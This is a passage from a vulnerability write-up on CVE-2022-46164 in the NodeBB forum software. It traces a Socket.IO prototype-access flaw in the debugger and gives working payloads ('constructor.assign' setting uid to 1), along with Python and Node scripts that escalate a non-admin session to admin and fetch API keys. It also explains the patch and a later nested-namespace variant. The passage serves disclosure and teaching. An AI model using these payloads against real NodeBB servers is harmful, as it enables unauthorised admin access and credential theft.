<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["myEventName",["myParams"],"myCallback"]
</code></pre></div></div>
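<p>As an aside, you could also send such a message directly from Python rather than through a proxy. The following is a rough sketch using the <code class="language-plaintext highlighter-rouge">websocket-client</code> package; the host, port and session cookie are placeholder values, and the Engine.IO handshake details (the <code class="language-plaintext highlighter-rouge">EIO=4</code> parameter and the <code class="language-plaintext highlighter-rouge">40</code> namespace connect packet) may vary with the Socket.IO version in use.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from websocket import create_connection  # pip install websocket-client

# Placeholder target address and session cookie values
ws = create_connection(
    'ws://192.168.56.10:4567/socket.io/?EIO=4&transport=websocket',
    cookie='express.sid=<your_session_cookie>',
)
print(ws.recv())   # engine.io open packet, starts with '0'
ws.send('40')      # connect to the default Socket.IO namespace
print(ws.recv())   # namespace connect response, starts with '40'
ws.send('421["myEventName",["myParams"],"myCallback"]')
print(ws.recv())   # server response / ack
</code></pre></div></div>
<p>For the walkthrough below though, we will stick with Burp.</p>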
<p>The easiest way to do this is to reuse an existing WebSocket in Burp to send our own message.</p>
<p><strong>Disable the breakpoint</strong> by unticking it in the Breakpoints pane in Visual Studio Code.</p>
<p>Then refresh NodeBB in your browser. This should cause WebSocket messages to appear in the “Websockets History” tab in Burp. Send one of these messages to Burp’s Repeater. Ensure the <code class="language-plaintext highlighter-rouge">Send</code> option is available. If it isn’t, the socket is dead. Repeat this process until you can get a live socket in Repeater.</p>
<p><strong>Enable the breakpoint</strong> again in Visual Studio Code. Then select <code class="language-plaintext highlighter-rouge">To server</code> in the drop down box and send the message.</p>
<figure><img src="/assets/img/cve202246164_image1.jpg" alt="Sending data via WebSockets in Burp" /><figcaption align="center">Fig.1 - Sending data via WebSocket in Burp</figcaption></figure>
<p>Once you send the message, NodeBB should pause in the Visual Studio Code debugger. We can now explore the program’s internals.</p>
<p>Let’s start by viewing the <code class="language-plaintext highlighter-rouge">payload</code> variable. Type <code class="language-plaintext highlighter-rouge">payload</code> in the “Debug Console” in Visual Studio Code. This will dump the variable in a form we can explore by expanding the sections that interest us.</p>
<figure><img src="/assets/img/cve202246164_image2.jpg" alt="Exploring the payload variable in the debugger" /><figcaption align="center">Fig.2 - Exploring the payload variable in the debugger</figcaption></figure>
<p>From this we can see:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">payload.data[0]</code> contains <code class="language-plaintext highlighter-rouge">myEventName</code>,</li>
<li><code class="language-plaintext highlighter-rouge">payload.data[1]</code> contains<code class="language-plaintext highlighter-rouge">['myParams']</code>, and</li>
<li><code class="language-plaintext highlighter-rouge">payload.data[2]</code> contains <code class="language-plaintext highlighter-rouge">myCallback</code>.</li>
</ul>
<p>Yet, we can also see content that we <strong>did not</strong> provide stored in <code class="language-plaintext highlighter-rouge">payload.data[3]</code>. This last element of the <code class="language-plaintext highlighter-rouge">payload.data</code> array is the one that gets stored in the <code class="language-plaintext highlighter-rouge">callback</code> variable.</p>
<p>It looks like we <strong>can</strong> control the values of <code class="language-plaintext highlighter-rouge">eventName</code> and <code class="language-plaintext highlighter-rouge">params</code>, but <strong>not</strong> <code class="language-plaintext highlighter-rouge">callback</code>. If we step through the code to line 119 and view the values of these variables in the console, we can see this is the case.</p>
<figure><img src="/assets/img/cve202246164_image3.jpg" alt="Checking the eventName, etc variables..." /><figcaption align="center">Fig.3 - Checking the eventName, etc variables...</figcaption></figure>
<p>Let’s continue stepping through the code and see what happens next. If we step to line 125, we can see how the <code class="language-plaintext highlighter-rouge">methodToCall</code> variable is set.</p>
<p>On <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L123">line 123</a>, the <code class="language-plaintext highlighter-rouge">eventName</code> variable is split on the <code class="language-plaintext highlighter-rouge">.</code> character and placed into the <code class="language-plaintext highlighter-rouge">parts</code> array. Our provided value, <code class="language-plaintext highlighter-rouge">myEventName</code> contains no <code class="language-plaintext highlighter-rouge">.</code> characters, resulting in <code class="language-plaintext highlighter-rouge">parts</code> being defined as <code class="language-plaintext highlighter-rouge">['myEventName']</code>.</p>
<p>Next, on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L124">line 124</a>, <code class="language-plaintext highlighter-rouge">namespace</code> is set to the first element of the <code class="language-plaintext highlighter-rouge">parts</code> array. This is <code class="language-plaintext highlighter-rouge">myEventName</code> in our case.</p>
<p>Next, on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L125">line 125</a> the <code class="language-plaintext highlighter-rouge">methodToCall</code> variable is set. The code defining this variable continues over several lines, so it helps to break it down a little.</p>
<p>As a reminder, it looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const methodToCall = parts.reduce((prev, cur) => {
if (prev !== null && prev[cur]) {
return prev[cur];
}
return null;
}, Namespaces);
</code></pre></div></div>
<p>This code is running the JavaScript <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/reduce">reduce</a> method against the <code class="language-plaintext highlighter-rouge">parts</code> array. <code class="language-plaintext highlighter-rouge">reduce</code> repeatedly runs a provided function on every element of an array. The output of the previous execution is then used as the input of the next. An initial value is provided to <code class="language-plaintext highlighter-rouge">reduce</code> for input to the first iteration of the function. In this case the value is the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable.</p>
<p>The function executed in this case is one that accesses an existing property of an object by name. This operates in the manner of <code class="language-plaintext highlighter-rouge">object['propertyName']</code>. If the property does not exist, the function returns <code class="language-plaintext highlighter-rouge">null</code>.</p>
<p>So in this particular case, it would <em>try</em> and access <code class="language-plaintext highlighter-rouge">Namespaces['myEventName']</code>. If <code class="language-plaintext highlighter-rouge">parts</code> contains multiple elements, subsequent elements operate as child accessors. So a <code class="language-plaintext highlighter-rouge">parts</code> value of <code class="language-plaintext highlighter-rouge">['element1','element2',]</code> is equal to <code class="language-plaintext highlighter-rouge">Namespaces['element1']['element2']</code> . Thus, <code class="language-plaintext highlighter-rouge">Namespaces</code> functions as an allow list for populating <code class="language-plaintext highlighter-rouge">methodToCall</code>.</p>
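<p>If the JavaScript <code class="language-plaintext highlighter-rouge">reduce</code> idiom is unfamiliar, a rough Python analogue of the lookup logic may help; the <code class="language-plaintext highlighter-rouge">namespaces</code> structure below is a made up stand-in for the real <code class="language-plaintext highlighter-rouge">Namespaces</code> object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from functools import reduce

# Simplified stand-in for the Namespaces allow list
namespaces = {'admin': {'config': {'setMultiple': lambda *args: None}}}

def lookup(event_name):
    # Walk the dotted path through the nested objects, returning None
    # as soon as a property is missing, mirroring the JS reduce call
    return reduce(
        lambda prev, cur: prev.get(cur) if isinstance(prev, dict) else None,
        event_name.split('.'),
        namespaces,
    )

print(lookup('admin.config.setMultiple'))  # the placeholder function above
print(lookup('admin.missing.function'))    # None
</code></pre></div></div>
<p>One important difference: a Python dict lookup like this only ever returns keys that were explicitly added, whereas the JavaScript <code class="language-plaintext highlighter-rouge">prev[cur]</code> property access can also reach inherited prototype properties, which is what makes the next part interesting.</p>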
<p>What’s in this <code class="language-plaintext highlighter-rouge">Namespaces</code> variable that’s restricting the functions we can call?</p>
<p>It’s defined on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L16">line 16</a> as below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = {};
</code></pre></div></div>
<p>And it is populated with values in the function <code class="language-plaintext highlighter-rouge">requireModules</code> on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L173">line 173</a> like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function requireModules() {
const modules = [
'admin', 'categories', 'groups', 'meta', 'modules',
'notifications', 'plugins', 'posts', 'topics', 'user',
'blacklist', 'uploads',
];
modules.forEach((module) => {
Namespaces[module] = require(`./${module}`);
});
}
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">Namespaces</code> contains each of the named modules in the <code class="language-plaintext highlighter-rouge">/src/socket.io</code> folder in the NodeBB code. Functions from <code class="language-plaintext highlighter-rouge">admin.js</code> are under the property <code class="language-plaintext highlighter-rouge">Namespaces['admin']</code> and so on. If we view <code class="language-plaintext highlighter-rouge">Namespaces</code> in the Debug Console we can see these module names.</p>
<figure><img src="/assets/img/cve202246164_image4.jpg" alt="The Namespaces variable in the debugger" /><figcaption align="center">Fig.4 - The Namespaces variable in the debugger</figcaption></figure>
<p>Something else we can see in the above however is a lighter colored <code class="language-plaintext highlighter-rouge">[[Prototype]]</code> reference. What is this?</p>
<p>JavaScript has prototype inheritance for objects. For a detailed explanation, you can read <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain">here</a>.</p>
<p>Objects in JavaScript inherit additional properties through parent objects. These properties are accessible through the “prototype” of the object. By default, this applies to even the simplest object types, such as those defined like <code class="language-plaintext highlighter-rouge">Namespaces</code> above.</p>
<p>Sometimes, it’s possible to change properties of parent objects from the child. This last characteristic leads to a class of vulnerabilities called “prototype pollution”. Objects based on a modified parent become “polluted” from changes to that parent. This “pollution” can lead to the program to operate in unintended ways.</p>
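<p>As a quick illustration of the concept (a contrived example, and not something this exploit relies on), note how writing through <code class="language-plaintext highlighter-rouge">__proto__</code> on one object can affect a completely unrelated object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Writing through __proto__ on one object modifies the shared Object.prototype...
const obj = {};
obj.__proto__.polluted = 'yes';

// ...so a brand new, unrelated object now appears to have the property
console.log({}.polluted); // 'yes'

// Clean up so the rest of the session is unaffected
delete Object.prototype.polluted;
</code></pre></div></div>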
<p>This, however, is not what we are doing here. We are not going to be “polluting” any objects. What we <strong>can</strong> do is use the prototype of <code class="language-plaintext highlighter-rouge">Namespaces</code> to assign unintended functions to <code class="language-plaintext highlighter-rouge">methodToCall</code>.</p>
<p>If we expand the <code class="language-plaintext highlighter-rouge">[[Prototype]]</code> entry in the Debug Console, we can see what the prototype gives us access to.</p>
<figure><img src="/assets/img/cve202246164_image5.jpg" alt="Namespaces expanded" /><figcaption align="center">Fig.5 - Namespaces expanded</figcaption></figure>
<p>Whatever we select has to do something useful when executed as per <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L163">line 163</a> in the NodeBB code, assuming that the function is not of type Async (which is the case for all the prototype functions).</p>
<p>As a reminder, the (non-Async) invocation of <code class="language-plaintext highlighter-rouge">methodToCall</code> looks like this. (Code reformatted to fit on one line).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>methodToCall(socket, params, (err, result) => {callback(err ? { message: err.message } : null, result);});
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">methodToCall</code> is invoked with three parameters. The first is the <code class="language-plaintext highlighter-rouge">socket</code> parameter passed to the <code class="language-plaintext highlighter-rouge">onMessage</code> function. The second is the <code class="language-plaintext highlighter-rouge">params</code> variable which we control. The third is an anonymous function which executes the <code class="language-plaintext highlighter-rouge">callback</code> that we don’t control.</p>
<p>Back to the <code class="language-plaintext highlighter-rouge">params</code> variable. What type of content can we include in this?</p>
<p>Can we pass in a function that we could then have executed? Unfortunately, it appears not. The <code class="language-plaintext highlighter-rouge">socket.io-parser</code> Node module does a simple <code class="language-plaintext highlighter-rouge">JSON.parse</code> on received data. This means we can only provide a limited set of simple types for this value. Anything that’s not reducible to standard JSON causes an error.</p>
<p>I spent many hours attempting code execution using the <code class="language-plaintext highlighter-rouge">Namespaces</code> prototype accessor, without success (let me know if you manage it). Then I decided to see what I could do to the <code class="language-plaintext highlighter-rouge">socket</code> object. Here is what this object looks like in the debugger.</p>
<figure><img src="/assets/img/cve202246164_image6.jpg" alt="The socket variable" /><figcaption align="center">Fig.6 - The socket variable</figcaption></figure>
<p>One property that immediately jumped out at me here was the <code class="language-plaintext highlighter-rouge">uid</code> parameter. The screenshot above is from a session logged on as the <code class="language-plaintext highlighter-rouge">admin</code> user, with a user id of 1. Unsurprisingly, the <code class="language-plaintext highlighter-rouge">uid</code> value here matches the user id of the user that created the socket. This is also the value used to make access control decisions for socket operations. If you call an admin function in the socket, the <code class="language-plaintext highlighter-rouge">uid</code> value must be an admin user id. If a non-admin user can change their socket’s <code class="language-plaintext highlighter-rouge">uid</code> value to an admin’s user id, they can call admin functions.</p>
<p>Remember that <code class="language-plaintext highlighter-rouge">socket</code> is the first parameter provided to <code class="language-plaintext highlighter-rouge">methodToCall</code>. And the second is <code class="language-plaintext highlighter-rouge">params</code> which we control, but which can contain only simple types. Is there a function in the prototype that allows us to change <code class="language-plaintext highlighter-rouge">socket</code> given these conditions? We need a function that takes at least two parameters and modifies its first parameter based on the second.</p>
<p>As it turns out, there is: <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/assign">Object.assign()</a>. <code class="language-plaintext highlighter-rouge">assign</code> copies the properties from the object in parameter two to the object in parameter one, and leaves all other properties of object one unmodified. This is exactly what we need.</p>
<p>We are also lucky in that JavaScript simply ignores extraneous function parameters, instead of erroring out as would happen in most other programming languages. This means we don’t have to worry about the anonymous function in parameter three.</p>
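<p>A trivial Node REPL example of this behaviour:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> const f = (a, b) => [a, b];
undefined
> f(1, 2, 3) // the third argument is silently ignored
[ 1, 2 ]
</code></pre></div></div>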
<p>Here we can see the assign function within the prototype inheritance of the <code class="language-plaintext highlighter-rouge">Namespaces</code> object.</p>
<figure><img src="/assets/img/cve202246164_image7.jpg" alt="The assign function under Namespaces" /><figcaption align="center">Fig.7 - The assign function under Namespaces</figcaption></figure>
<p>And here we see how it’s possible to access the assign function via <code class="language-plaintext highlighter-rouge">Namespaces</code>. We can use the syntax <code class="language-plaintext highlighter-rouge">Namespaces['__proto__']['constructor']['assign']</code>, or the shorter version <code class="language-plaintext highlighter-rouge">Namespaces['constructor']['assign']</code>.</p>
<figure><img src="/assets/img/cve202246164_image8.jpg" alt="Accessing the assign function through Namespaces array index" /><figcaption align="center">Fig.8 - Accessing the assign function through Namespaces array index</figcaption></figure>
<p>This snippet, run in the Node REPL, shows how this attack will work. We set initial values for <code class="language-plaintext highlighter-rouge">socket</code>, <code class="language-plaintext highlighter-rouge">Namespaces</code> and <code class="language-plaintext highlighter-rouge">params</code> to mimic NodeBB operating as a non-admin.</p>
<p>We set <code class="language-plaintext highlighter-rouge">Namespaces</code> to its empty default state, which still contains the prototype.</p>
<p>We set <code class="language-plaintext highlighter-rouge">socket</code> with a <code class="language-plaintext highlighter-rouge">uid</code> of <code class="language-plaintext highlighter-rouge">2</code> and an additional mock value we want to remain unchanged.</p>
<p>We set <code class="language-plaintext highlighter-rouge">params</code> to an object where <code class="language-plaintext highlighter-rouge">uid</code> is <code class="language-plaintext highlighter-rouge">1</code>. This is our desired value for <code class="language-plaintext highlighter-rouge">uid</code> in <code class="language-plaintext highlighter-rouge">socket</code>.</p>
<p>Then we assign the <code class="language-plaintext highlighter-rouge">assign</code> function to <code class="language-plaintext highlighter-rouge">methodToCall</code> using the <code class="language-plaintext highlighter-rouge">Namespaces</code> prototype. This is functionally the manner in which NodeBB operates if passed <code class="language-plaintext highlighter-rouge">constructor.assign</code> as a function name.</p>
<p>Finally we call <code class="language-plaintext highlighter-rouge">methodToCall</code> in the same way that NodeBB does.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.18.1.
Type ".help" for more information.
> Namespaces = {}
{}
> socket = {'uid': 2, 'otherThing': 'value'}
{ uid: 2, otherThing: 'value' }
> params = {'uid': 1}
{ uid: 1 }
> methodToCall = Namespaces['constructor']['assign']
[Function: assign]
> methodToCall(socket, params, (err, result) => {callback(err ? { message: err.message } : null, result);})
{ uid: 1, otherThing: 'value' }
> socket
{ uid: 1, otherThing: 'value' }
>
</code></pre></div></div>
<p>Note that after <code class="language-plaintext highlighter-rouge">methodToCall</code> executes, the <code class="language-plaintext highlighter-rouge">uid</code> property of <code class="language-plaintext highlighter-rouge">socket</code> has changed to <code class="language-plaintext highlighter-rouge">1</code>. The other mock property of <code class="language-plaintext highlighter-rouge">socket</code> remains unchanged.</p>
<p>For us to perform this operation through a socket call we would send the following to NodeBB (the leading <code class="language-plaintext highlighter-rouge">4</code> is the Engine.IO “message” packet type, the <code class="language-plaintext highlighter-rouge">2</code> is the Socket.IO “event” packet type, and the <code class="language-plaintext highlighter-rouge">1</code> is an acknowledgement id):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>Let’s log on to NodeBB as a non-admin user and try this (remember you might have to temporarily disable debugging to log on). Let’s debug and confirm the <code class="language-plaintext highlighter-rouge">uid</code> value in <code class="language-plaintext highlighter-rouge">socket</code>.</p>
<figure><img src="/assets/img/cve202246164_image9.jpg" alt="Checking the uid value in the socket" /><figcaption align="center">Fig.9 - Checking the uid value in the socket</figcaption></figure>
<p><strong>Disable debugging</strong> now so we can communicate with the socket without interruption.</p>
<p>Now let’s send a test admin request to the socket. Here we try to fetch API keys from the application settings. We are not an admin, so we get a message back saying <code class="language-plaintext highlighter-rouge">error:no-privileges</code>:</p>
<figure><img src="/assets/img/cve202246164_image10.jpg" alt="Unsuccessfully attempting an admin function call" /><figcaption align="center">Fig.10 - Unsuccessfully attempting an admin function call</figcaption></figure>
<p>Next, we send our privilege escalation attack. See the message sent at 15:24:54 in the History tab in Fig 11 below.</p>
<p>Then we repeat the admin operation.</p>
<figure><img src="/assets/img/cve202246164_image11.jpg" alt="Privilege escalation and successfully performing an admin function call" /><figcaption align="center">Fig.11 - Privilege escalation and successfully performing an admin function call</figcaption></figure>
<p>This time it is a success. We can retrieve API keys.</p>
<p>Under the right circumstances, this attack also works on unauthenticated NodeBB sessions, which have sockets with a <code class="language-plaintext highlighter-rouge">uid</code> of 0. This requires that NodeBB has no enabled plugins that modify socket authorisation checks. The 2factor plugin is one example of a plugin that does this: it checks session properties when making socket access control decisions, and an authenticated session of some type must exist for the check to succeed. So when a plugin like this is enabled, this is just a privilege escalation, not an authorisation bypass.</p>
<h2 id="exploiting-behind-fronting-services-and-enhancing-ease-of-use">Exploiting behind fronting services and enhancing ease of use</h2>
<p>To this point, exploitation of this vulnerability has been awkward. We piggybacked on existing WebSocket connections in Burp, and we need to send any admin functions we want to run within the same escalated socket to get them to work. Also, if the NodeBB instance does not support WebSockets, this approach won’t work at all. If the NodeBB instance is hosted behind fronting providers like CloudFlare, it is likely WebSockets won’t be supported.</p>
<p>We can address this by using Socket.IO “polling”. This is the mode that Socket.IO uses to operate over pure HTTP.</p>
<p>To see this natively in NodeBB you can modify your <code class="language-plaintext highlighter-rouge">config.json</code> file as described <a href="https://community.nodebb.org/topic/9990/how-to-use-nodebb-websocket-with-cdn-which-doesn-t-support-websocket">here</a>. This will disable WebSocket support and allow you to observe the “polling” mode in operation. This provides a good example for reverse engineering.</p>
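<p>Based on that post, the relevant <code class="language-plaintext highlighter-rouge">config.json</code> addition is along the following lines (the exact key structure may vary between NodeBB versions, so treat this as a sketch).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"socket.io": {
    "transports": ["polling"]
}
</code></pre></div></div>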
<p>The following is a high level explanation of how polling can be used. If you are looking to escalate privileges for an existing session, make sure to include the session cookie with all requests on the socket.</p>
<p>You can establish a polling-based session with NodeBB by sending an HTTP <code class="language-plaintext highlighter-rouge">GET</code> request to a URL as shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/socket.io/?EIO=4&transport=polling&t=mGkgMb
</code></pre></div></div>
<p>The value of the <code class="language-plaintext highlighter-rouge">t</code> URL parameter is set to a random 6-character alpha string, in this case <code class="language-plaintext highlighter-rouge">mGkgMb</code>. This value changes with each new socket.</p>
<p>The HTTP response from NodeBB will contain something similar to the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0{"sid":"cifBV2fveLLpUfAEAAAE","upgrades":[],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">sid</code> value returned is sent as a <code class="language-plaintext highlighter-rouge">GET</code> parameter along with all future requests on the socket. In this example all further communication on this socket will go to the following URL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/socket.io/?EIO=4&transport=polling&t=mGkgMb&sid=cifBV2fveLLpUfAEAAAE
</code></pre></div></div>
<p>When using the socket, all data that is sent <strong>to</strong> the server is provided in the body of <code class="language-plaintext highlighter-rouge">POST</code> requests. Data received <strong>from</strong> the server is obtained using <code class="language-plaintext highlighter-rouge">GET</code> requests. The server will return all messages in the polling queue for the client in its response to each <code class="language-plaintext highlighter-rouge">GET</code>.</p>
<p>Unlike native HTTP <code class="language-plaintext highlighter-rouge">POST</code> requests, responses relating to the request are <strong>not</strong> returned in the response to the <code class="language-plaintext highlighter-rouge">POST</code>. You need to make a subsequent <code class="language-plaintext highlighter-rouge">GET</code> request to retrieve the response from the polling queue. What you will normally receive in response to a <code class="language-plaintext highlighter-rouge">POST</code> to the server is an <code class="language-plaintext highlighter-rouge">ok</code>.</p>
<p>The first message we want to send to the server to fully establish the session is a “handshake”, which is <code class="language-plaintext highlighter-rouge">40</code>, sent with a <code class="language-plaintext highlighter-rouge">POST</code> as discussed. Follow this up with a <code class="language-plaintext highlighter-rouge">GET</code> to retrieve the response to the “handshake”. In this example this looked as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>40{"sid":"4eGiqjzlLKwLvS3QAAAF"} 42["checkSession",3] 42["setHostname","vm01"]
</code></pre></div></div>
<p>Now we can perform our privilege escalation. Send a <code class="language-plaintext highlighter-rouge">POST</code> like the following. There is no need for any follow-up <code class="language-plaintext highlighter-rouge">GET</code> polling for this request, as it will not generate a response.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>Now we should have an admin session. Next, send an admin request in a <code class="language-plaintext highlighter-rouge">POST</code>; the following will request API keys. Then issue a <code class="language-plaintext highlighter-rouge">GET</code> to retrieve the response.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>422["admin.settings.get",{"hash": "core.api"}]
</code></pre></div></div>
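<p>Tying these steps together, the following is a minimal sketch of the full polling flow in Node (assuming Node 18+ for the global <code class="language-plaintext highlighter-rouge">fetch</code>, a local unauthenticated instance at the address below, and no error handling). For an authenticated session you would also add the session cookie as a <code class="language-plaintext highlighter-rouge">Cookie</code> header on every request.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Sketch only: target address and payloads as per the examples above
const base = 'http://127.0.0.1:4567/socket.io/?EIO=4&transport=polling&t=mGkgMb';

(async () => {
    // 1. Open a polling session; the response body is '0' followed by JSON
    const open = await (await fetch(base)).text();
    const sid = JSON.parse(open.slice(1)).sid;
    const url = `${base}&sid=${sid}`;

    // 2. Send the '40' handshake, then drain the polling queue
    await fetch(url, { method: 'POST', body: '40' });
    await (await fetch(url)).text();

    // 3. Privilege escalation payload (generates no response to poll for)
    await fetch(url, { method: 'POST', body: '421["constructor.assign",{"uid":1}]' });

    // 4. Admin request, then poll for its result
    await fetch(url, { method: 'POST', body: '422["admin.settings.get",{"hash":"core.api"}]' });
    console.log(await (await fetch(url)).text());
})();
</code></pre></div></div>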
<p>A simple Python POC implementing these operations is linked below. Running it against a local NodeBB instance with an authenticated session would involve the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc.py -d 127.0.0.1:4567 -u 1 -n -c <cookie_value>
</code></pre></div></div>
<p>The code for the POC exploit can be found <a href="https://github.com/stephenbradshaw/CVE-2022-46164-poc">here</a>.</p>
<h2 id="the-fix-for-the-vulnerability">The fix for the vulnerability</h2>
<p>This vulnerability was patched in commit <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">48d143921753914da45926cca6370a92ed0c46b8</a>. If you look at the commit, you will see that it involves one very simple change.</p>
<p>The initialization for the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable changes from this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = {};
</code></pre></div></div>
<p>To this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = Object.create(null);
</code></pre></div></div>
<p>What has been done here? According to the Mozilla JavaScript reference for <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects">Object</a>:</p>
<blockquote>
<p>Almost all objects in JavaScript ultimately inherit from Object.prototype (see inheritance and the prototype chain). However, you may create null-prototype objects using Object.create(null) or the object initializer syntax with __proto__: null (note: the __proto__ key in object literals is different from the deprecated Object.prototype.__proto__ property). You can also change the prototype of an existing object to null by calling Object.setPrototypeOf(obj, null).</p>
</blockquote>
<p>So after this change the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable is a null-prototype object. How does this help resolve this vulnerability?</p>
<p>Let’s compare objects created using the previous and current approaches in the Node REPL to see how they differ.</p>
<p>Below we create <code class="language-plaintext highlighter-rouge">Namespaces1</code> using the original JavaScript object approach, and <code class="language-plaintext highlighter-rouge">Namespaces2</code> using the null-prototype approach. Then we try to use tab completion on each variable to see the accessible properties. (Type the variable name, followed by <code class="language-plaintext highlighter-rouge">.</code>, then hit tab twice to have the REPL “complete” the available options for you.)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.19.0.
Type ".help" for more information.
> const Namespaces1 = {};
undefined
> const Namespaces2 = Object.create(null);
undefined
> Namespaces1.
Namespaces1.__proto__ Namespaces1.constructor Namespaces1.hasOwnProperty
Namespaces1.isPrototypeOf Namespaces1.propertyIsEnumerable Namespaces1.toLocaleString
Namespaces1.toString Namespaces1.valueOf
> Namespaces2.
</code></pre></div></div>
<p>Using the tab completion approach, we see that <code class="language-plaintext highlighter-rouge">Namespaces1</code>, created as a normal JavaScript object, has a number of accessible properties “completed” for us. <code class="language-plaintext highlighter-rouge">Namespaces2</code>, however, created with a null-prototype, shows none.</p>
<p>What if we specifically try to access properties such as the <code class="language-plaintext highlighter-rouge">constructor</code> used in the exploit?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> Namespaces2.constructor
undefined
> Namespaces1.constructor
[Function: Object]
>
</code></pre></div></div>
<p>We can see that the <code class="language-plaintext highlighter-rouge">constructor</code> is not available in the null-prototype object.</p>
<p>The null-prototype version of the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable therefore fixes this vulnerability by removing access to properties we use for the exploit.</p>
<h2 id="update-an-additional-patch-for-nested-namespaces">UPDATE: An additional patch for nested namespaces</h2>
<p>A <a href="https://github.com/NodeBB/NodeBB/commit/586eed1407a78a1c1ec3af9bef3866104d3ef7cd">new patch</a> from 31 December 2022 provides a fix for “vulnerability in socket.io nested namespaces”. This new patch is included in NodeBB release <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a>.</p>
<p>As mentioned above, the socket.io code has a <code class="language-plaintext highlighter-rouge">Namespaces</code> object that acts as an allow list for callable functions. The initial fix defined this variable as a null-prototype object, removing the inherited methods and properties that allowed us to access the <code class="language-plaintext highlighter-rouge">assign</code> function and perform the exploit.</p>
<p>However, a number of the modules that are populated into the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable have child objects that include prototypes.</p>
<p>A list of these in the NodeBB base code is below:</p>
<ul>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/admin/rooms.js#L15">admin.rooms.stats</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/admin/rooms.js#L16">admin.rooms.totals</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/groups.js#L238">groups.cover</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/meta.js#L8">meta.rooms</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/modules.js#L16">modules.chats</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/modules.js#L17">modules.settings</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/user.js#L39">user.reset</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/user.js#L175">user.gdpr</a></li>
</ul>
<p>Installed plugins could also expose additional objects not listed above.</p>
<p>Any of these allow the exploit to be performed after the 2.6.1 patch by providing additional paths to access the default object prototype. (Although the <code class="language-plaintext highlighter-rouge">admin</code> functions are not usable for this as they are limited to admins only).</p>
<p>So, for example, instead of sending our original exploit payload:</p>
